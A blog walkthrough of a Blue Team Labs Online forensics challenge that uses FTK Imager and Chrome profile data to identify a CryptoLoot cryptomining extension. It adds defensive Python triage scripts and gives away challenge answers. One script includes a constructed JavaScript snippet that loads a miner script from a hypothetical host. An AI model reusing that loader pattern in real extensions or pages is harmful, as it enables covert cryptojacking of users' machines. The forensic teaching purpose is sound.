Blue Team Labs Online — Browser Forensics — Cryptominer Walkthrough

An incident response challenge using FTK Imager and the Google Chrome browser cache.

Drew Arpino
9 min read · Feb 10, 2025
Image Credit: https://blueteamlabs.online/

Introduction:

Welcome to my weekly walkthrough! If you’ve stumbled across this blog searching for a comprehensive walkthrough of the Browser Forensics -Cryptominer challenge from Blue Team Labs Online, you’re in the right place.

In this incident response scenario, we’re handed a forensic image of a victim’s device suspected to be infected with crypto mining malware, and it’s up to us to uncover more details about the activity. Our objective is to analyze the user’s local Google Chrome data to identify the miner, determine whether it’s malicious, and understand how it operates.

To perform the analysis, we’re going to leverage FTK Imager to explore the device image. Then, we’ll examine the Google Chrome cache and enrich our findings with some external research to learn more about the crypto miner. Sounds like fun, right? Let’s get into it!

And if you find this walkthrough helpful — whether it levels-up your skills, gets you over a stumbling block, or serves as a handy reference — please give it a clap and consider following me for more content like this.

Thanks for reading and going on this investigation with me!

Challenge Link: https://blueteamlabs.online/home/challenge/browser-forensics-cryptominer-aa00f593cb

Challenge Scenario:

Our SOC alerted that there is some traffic related to crypto mining from a PC that was just joined to the network. The incident response team acted immediately and observed that the traffic is originating from browser applications. After collecting all key browser data using FTK Imager, it is your job to use the ad1 file to investigate the crypto mining activity.

Set up the Analysis Environment & Extract the Challenge File:

Safety first! It’s always important when working with lab/challenge files from Blue Team Labs Online (or any educational lab/challenge/range) to keep yourself protected by performing these tasks in a dedicated, isolated virtual machine environment. For example, I’m using FLARE-VM for this challenge and walkthrough.

To keep this write-up focused I’m going to skip the step-by-step setup of FLARE-VM but if you’d like to set up your own environment, please follow the directions provided directly by FLARE-VM on GitHub.

Okay! Once we have our virtual environment created, updated, isolated, and snapshotted, we can extract the challenge file and start our investigation!

Question 1: How many browser-profiles are present in Google Chrome?

Let’s kick off this challenge by extracting the challenge file, TUJTWfM5uUCHWUHzC5cfEDVYZqw9tYSgS53jWRKc, with the provided password. Inside, we’ll find a folder containing BrowserData.zip; go ahead and extract that one, too.

This will give us the challenge file browserdata.ad1, an AccessData logical image: the format FTK Imager writes when you acquire selected folders and files rather than a whole disk. If you aren’t familiar with it, FTK Imager is a free forensic imaging tool. For this challenge, we’ll use it to load the evidence file so that we can browse the file system captured inside it, locate the user’s Chrome profile data, and export artifacts from the image for closer analysis.

To start, launch FTK Imager and load the file by pressing File > Add Evidence Item > Image File > Select the extracted Challenge File (browserdata.ad1).

Loading the Challenge File in FTK Imager

Now that the image is loaded, we can expand the evidence tree and browse the artifacts it contains.

Since the alert pointed to a browser-based attack, we need to navigate to the file path for the Google Chrome Browser data. You might be asking yourself, “where do I find that?” — great question! I’ll point to a handy resource from Foxton Forensics, Browser History Examiner — User Guide which can help point us in the right direction:

Location of Google Chrome history

Windows

C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default
C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Cache

Back in FTK, navigate to that file path:

To answer Question 1, we need to find the profile directories and count them. Chrome stores each profile as its own folder directly under C:\Users\<username>\AppData\Local\Google\Chrome\User Data: the first is named Default, and any additional profiles are named Profile 1, Profile 2, and so on. As a cross-check, the Local State JSON file in the same User Data folder lists every profile under its profile.info_cache key.

Based on the evidence, there are two profiles: Default and Profile 1.

Question 2: What is the name of the browser theme installed on Google Chrome?

To answer Question 2, we’re searching for a browser theme. Let’s refer back to the Foxton Forensics guide, which tells us that a user’s browser settings are stored in the Preferences JSON file (there is one per profile).

Let’s check it out and leverage the “find” function to search for “theme.”

Examining the Preferences file for Google Chrome

The search lands on a 32-character string under the extensions.theme key. That is an extension ID, which Chrome spells using only the letters a to p. Every installed extension, themes included, has a folder named after its ID under Extensions, with a version subfolder that holds its manifest.json. A theme’s manifest often gives its name as a placeholder such as __MSG_name__, which Chrome fills in from the messages.json under the extension’s _locales folder, so that is where we go next to find the human-readable name.

But first, let’s get some background on what the messages.json is from Google:

Each internationalized extension has at least one file named messages.json that provides locale-specific strings.

In other words, this file holds the translated, locale-specific strings that the manifest refers to by placeholder. Maybe there is a helpful string here that reveals the extension name? Let’s open messages.json to find out!

Examining the English messages.json file

Bingo! Inside of the file, we’ll see that the message string displays the name “Earth in Space.”

Question 3: Identify the Extension ID and Extension Name of the cryptominer

Now that we’ve identified the theme extension, let’s turn our focus to scanning through the rest of the installed extensions looking for the cryptominer. To do this, we’ll review the manifest.json file for suspicious entries in each of the extension folders. But what is the manifest file, anyway? According to Google:

Every extension must have a manifest.json file in its root directory that lists important information about the structure and behavior of that extension. This page explains the structure of extension manifests and the features they can include.

With that in mind, we can check the files starting from the first extension and moving our way down the list. Eventually, we’ll stumble on the below extension:

egnfmleidkolminhjlkaomjefheafbbb
The manifest file for a suspicious cryptocurrency mining extension

This one looks suspicious. To confirm that it is the extension we’re after for Question 3, let’s pivot and gather some external intelligence about this extension ID on Chrome-Stats.

The lookup confirms that the extension is rated “very high risk” and was removed from the Chrome Web Store for malware. Treat that as corroboration rather than proof on its own: the manifest and the script it loads (which we examine next) are the primary evidence that the extension mines cryptocurrency.

Question 4: What is the description text of this extension?

Fortunately, we’ve already discovered the answer to Question 4 in the manifest.json file under the “description” tag. Additionally, we can also find it listed on the Chrome-Stats page.

Cryptominer extension description in the manifest.json
Cryptominer extension description on Chrome-Stats
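The three steps above (finding the theme ID in Preferences, walking each extension’s manifest.json, and resolving the name and description through messages.json) can be automated against a profile folder exported from the image. The script below is an added example, not part of the original walkthrough or the challenge files: it builds a constructed profile directory with hypothetical extension IDs, names and files, then inventories it the way Chrome would read it, resolving __MSG_key__ placeholders from _locales/<default_locale>/messages.json and flagging any extension that declares a background script.

```python
"""Inventory the extensions in an exported Chrome profile directory.

Added example, not code from the original walkthrough. Point inventory() at a
folder such as ".../User Data/Default" exported with FTK Imager. The profile
built by build_sample_profile() is constructed for the demo; its extension
IDs, names and files are hypothetical.
"""
import json
import os
import re
import tempfile

MSG_RE = re.compile(r"__MSG_(\w+)__")


def load_messages(version_dir, locale):
    """Load _locales/<locale>/messages.json, or {} if the extension has none."""
    path = os.path.join(version_dir, "_locales", locale, "messages.json")
    if not os.path.isfile(path):
        return {}
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def resolve(value, messages):
    """Replace every __MSG_key__ placeholder with its localized 'message'."""
    if not isinstance(value, str):
        return value
    return MSG_RE.sub(
        lambda m: messages.get(m.group(1), {}).get("message", m.group(0)), value)


def theme_id(profile_dir):
    """Return extensions.theme.id from the profile's Preferences JSON."""
    with open(os.path.join(profile_dir, "Preferences"), encoding="utf-8") as fh:
        prefs = json.load(fh)
    return prefs.get("extensions", {}).get("theme", {}).get("id")


def inventory(profile_dir):
    """One record per Extensions/<id>/<version> folder that has a manifest."""
    records = []
    ext_root = os.path.join(profile_dir, "Extensions")
    for ext_id in sorted(os.listdir(ext_root)):
        for version in sorted(os.listdir(os.path.join(ext_root, ext_id))):
            vdir = os.path.join(ext_root, ext_id, version)
            mpath = os.path.join(vdir, "manifest.json")
            if not os.path.isfile(mpath):
                continue
            with open(mpath, encoding="utf-8") as fh:
                manifest = json.load(fh)
            messages = load_messages(vdir, manifest.get("default_locale", "en"))
            bg = manifest.get("background", {})
            scripts = list(bg.get("scripts", []))   # Manifest V2 background page
            if "service_worker" in bg:              # Manifest V3 service worker
                scripts.append(bg["service_worker"])
            records.append({
                "id": ext_id,
                "version": version,
                "name": resolve(manifest.get("name"), messages),
                "description": resolve(manifest.get("description"), messages),
                "is_theme": "theme" in manifest,
                "background_scripts": scripts,
                "permissions": manifest.get("permissions", []),
            })
    return records


def _write_json(path, obj):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(obj, fh)


def build_sample_profile():
    """Constructed stand-in for a Default profile; IDs and names are hypothetical."""
    root = tempfile.mkdtemp(prefix="chrome_profile_")
    theme, ext = "aaaabbbbccccddddeeeeffffgggghhhh", "ppppoooonnnnmmmmllllkkkkjjjjiiii"
    _write_json(os.path.join(root, "Preferences"),
                {"extensions": {"theme": {"id": theme}}})
    tdir = os.path.join(root, "Extensions", theme, "1.0_0")
    _write_json(os.path.join(tdir, "manifest.json"),
                {"name": "__MSG_appName__", "default_locale": "en",
                 "theme": {"colors": {}}, "manifest_version": 2})
    _write_json(os.path.join(tdir, "_locales", "en", "messages.json"),
                {"appName": {"message": "Sample Theme"}})
    _write_json(os.path.join(root, "Extensions", ext, "2.3_0", "manifest.json"),
                {"name": "Sample Extension", "description": "Constructed description",
                 "background": {"scripts": ["background.js"]},
                 "permissions": ["storage"], "manifest_version": 2})
    return root


if __name__ == "__main__":
    profile = build_sample_profile()
    print("theme id:", theme_id(profile))
    for rec in inventory(profile):
        tag = "THEME" if rec["is_theme"] else ("BACKGROUND" if rec["background_scripts"] else "")
        print(rec["id"], rec["version"], repr(rec["name"]), rec["background_scripts"], tag)
```

Run against a real export, the THEME record answers Question 2 and any record with a non-empty background_scripts list is the first place to look for Questions 3 through 5. Name and description come back already resolved, so a manifest that only shows __MSG_name__ no longer sends you hunting through locale folders by hand.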

Question 5: What is the name of the specific JavaScript web miner used in the browser extension?

To answer Question 5, we’re going to refer back to the manifest.json. Near the top of the file, the “background” key names the script that runs as the extension’s background page: background.js. In a Manifest V2 extension, which is what a “background” entry naming a script indicates, that page stays loaded for as long as Chrome is running and executes with the extension’s own privileges, exactly the foothold a browser-based miner needs.

Let’s extract the JavaScript and examine it more closely. To extract the file from the image, locate the script in FTK’s file list, right-click it, and select “Export Files…”

Exporting the JavaScript from FTK

Once the file is exported, open it in Notepad++ or another text editor to view the script. To answer Question 5, focus on lines 1 and 3, where we can determine that this script loads the CryptoLoot miner.

Question 6: How many hashes is the crypto miner calculating per second?

Continuing with our analysis of the miner in Notepad++, we can find a hashesPerSecond variable on line 17 with a value of 20.

Question 7: What is the public key associated with this mining activity?

Circling back to the variable on line 3, we’ll find the miner’s public key: the value that tells the mining service which account to credit the victim’s hashes to.
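Questions 5 through 7 all come from reading values out of the exported background.js: the library it loads, the rate variable, and the key. The script below is an added example and not part of the original walkthrough; it pulls those same indicator types out of a script automatically. SAMPLE_JS is a constructed stand-in for the challenge’s background.js, and its URL, key and numbers are hypothetical, not the real miner’s.

```python
"""Triage an exported extension background script for miner indicators.

Added example, not from the original walkthrough. It extracts what the
walkthrough read off background.js by hand: remote script URLs, long
alphanumeric string literals that could be a site/public key, and numeric
configuration assignments such as hashesPerSecond or threads. SAMPLE_JS is a
constructed stand-in; its URL, key and values are hypothetical.
"""
import re

SAMPLE_JS = r"""
var s = document.createElement('script');
s.src = 'https://miner.example.invalid/lib/miner.min.js';  // hypothetical loader URL
var publicKey = '0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef';
document.head.appendChild(s);
for (var i = 0; i < 3; i++) { /* constructed filler */ }
var hashesPerSecond = 20;
var options = { threads: 2, throttle: 0.5 };
"""

URL_RE = re.compile(r"""https?://[^\s'"<>]+""")
# 32+ alphanumeric characters between quotes: site keys, wallet-style tokens.
KEY_RE = re.compile(r"""['"]([A-Za-z0-9]{32,})['"]""")
# `name = 123` or `name: 1.5`; the (?!=) keeps `==` comparisons out.
NUM_RE = re.compile(r"""\b([A-Za-z_$][\w$]*)\s*(?::|=(?!=))\s*(-?\d+(?:\.\d+)?)\b""")


def extract_urls(js):
    """Remote resources the script pulls in (the miner library, a WebSocket pool)."""
    return sorted(set(URL_RE.findall(js)))


def extract_keys(js, min_len=32):
    """Long opaque string literals worth checking as a site or public key."""
    return sorted({k for k in KEY_RE.findall(js) if len(k) >= min_len})


def extract_numeric_config(js):
    """Map identifier -> number for simple numeric assignments and object fields."""
    out = {}
    for name, val in NUM_RE.findall(js):
        out[name] = float(val) if "." in val else int(val)
    return out


def triage(js):
    """Bundle the three indicator types for one script."""
    return {"urls": extract_urls(js), "keys": extract_keys(js),
            "numeric_config": extract_numeric_config(js)}


if __name__ == "__main__":
    for label, value in triage(SAMPLE_JS).items():
        print(f"{label}: {value}")
```

This is a first-pass filter, not a parser: loop counters such as i show up alongside hashesPerSecond, and a script that builds its URL or key from concatenated fragments, or that is minified or obfuscated, will slip past the regexes. Use it to decide where to read closely, then confirm each value in the editor as the walkthrough does.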

Question 8: What is the URL of the official Twitter page of the JavaScript web miner?

We’ve made it to the last question! To complete our investigation, we need to locate the official Twitter page for the CryptoLoot miner. All we need to do is perform a quick Google search.

Keep in mind, since this challenge was originally published, Twitter was rebranded to X, so the results might look a little different. But we can follow the answer format and use the Twitter domain instead. Go ahead and submit the answer, and let’s wrap up this challenge!

Conclusion:

Mission accomplished! Using FTK Imager, we explored a forensic image of the infected device, focusing on the Google Chrome profile data: the Preferences file and the Extensions folder. From those artifacts we identified a crypto mining extension, corroborated that it was malicious with Chrome-Stats, and then examined the miner’s JavaScript to understand how it works. Now that we have analyzed the miner and completed our objectives, let’s close out this walkthrough of Browser Forensics -Cryptominer with a big thank you to Blue Team Labs Online for the fun and engaging challenge!

Thanks for your support and going through this investigation with me. Remember, if you found this walkthrough helpful don’t forget to give it a clap! Your feedback really is invaluable and helps fuel my commitment to support your journey in the security community. Cybersecurity is a team sport and we’re in this together!

Until next week’s challenge — stay curious and be safe out there!

Tools & References:

FTK Imager: https://www.exterro.com/digital-forensics-software/ftk-imager

Foxton Forensics — Browser History Examiner — User Guide: https://www.foxtonforensics.com/browser-history-examiner/chrome-history-location

Chrome for Developers — Manifest file format: https://developer.chrome.com/docs/extensions/reference/manifest

Chrome-Stats: https://chrome-stats.com/
